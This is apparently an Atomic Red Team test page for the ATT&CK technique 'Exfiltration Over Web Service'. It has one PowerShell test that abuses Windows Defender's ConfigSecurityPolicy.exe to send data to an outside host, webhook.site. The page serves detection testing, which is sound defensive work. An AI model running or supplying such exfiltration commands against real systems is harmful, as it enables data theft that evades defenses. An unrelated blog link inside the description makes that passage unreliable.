Try it using Invoke-Atomic

Exfiltration Over Web Service

Description from ATT&CK

Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.

Web service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection. https://www.aleksandrhovhannisyan.com/blog/how-to-add-a-copy-to-clipboard-button-to-your-jekyll-blog/

Atomic Tests

Atomic Test #1 - Data Exfiltration with ConfigSecurityPolicy

Exfiltration of data using ConfigSecurityPolicy.exe https://debugactiveprocess.medium.com/data-exfiltration-with-lolbins-4d9c6e43dacf

Supported Platforms: windows

auto_generated_guid: 5568a8f4-a8b1-4c40-9399-4969b642f122

Inputs:

None

Attack Commands: Run with powershell!

1
2
3
$path = resolve-path "c:\ProgramData\Microsoft\Windows Defender\Platform\*\ConfigSecurityPolicy.exe"
& $path[0] c:\temp\config.xml "https://webhook.site?d=sensitive-data-here"

source